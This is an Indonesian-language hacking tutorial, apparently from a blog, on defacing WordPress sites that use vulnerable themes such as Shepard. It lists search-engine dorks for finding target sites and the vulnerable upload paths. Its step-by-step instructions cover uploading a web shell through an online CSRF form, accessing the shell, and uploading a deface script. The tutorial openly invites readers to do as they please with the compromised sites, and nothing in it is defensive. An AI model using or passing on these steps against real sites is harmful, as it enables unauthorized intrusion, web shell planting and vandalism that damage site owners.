Hello guys, Kembali lagi ama gua. Kali ini gua bakal share Tutorial Deface Wordpress Theme Shepard
Ya langsung aja
Bumbu :
- CSRF Onlen Disini
- Shell
- SC Pepes kelen
- Koneksi internet pastinya
Dork :
inurl:"/wp-content/themes/wilderness"
inurl:"/wp-content/themes/geoplaces"
inurl:"/wp-content/themes/cleanple"
inurl:"/wp-content/themes/brilliant"
inurl:"/wp-content/themes/qreator"
inurl:"/wp-content/themes/trymee"
inurl:"/wp-content/themes/pacifico"
inurl:"/wp-content/themes/ambleside"
inurl:"/wp-content/themes/clockstone"
inurl:"/wp-content/themes/money"
inurl:"/wp-content/themes/shepard"
Exploit :
/wp-content/themes/[Nama Theme]/theme/functions/uploadbg.php
/wp-content/themes/[Nama Theme]/theme/functions/upload-bg.php
/wp-content/themes/[Nama Theme]/theme/functions/upload.php
Lanjut tutor guys.
1. Seperti biasa dorking dulu di search engine agan agan .
2. Pilih target agan, Lalu masukkan exploit nya diatas , jangan lupa ganti " Nama Theme " dengan Theme pilihan agan
3. Nah kalo ada bacaan " error " berarti vuln , kalo ada bacaan " You must login blablabla " ikhlasin aja gan :v
4. Copy semua URL nya guys, Ex: http://target/wp-content/themes/[Nama Theme]/theme/functions/upload.php terus masukkin ke CSRF onlen
6. Taraaaaa , Shell sudah ter upload .
Nah, Kan itu muncul angka random tuh. itu shell agan yang udah ter upload.
Akses shell : target.com/wp-content/themes/[Nama Theme]/theme/functions/[Angka Random].php
Terserah mao ente apain tuh web itu hak kelen :v
Gua sih upload Script :v
Oke sekian aja tutorial dari gua , Semoga bermanfaat guys :)
Contact :
FB : Oces Oces
Tutorial Deface Wordpress Theme Shepard Arbitrary File Upload Vulnerability
4/
5
Oleh
ok
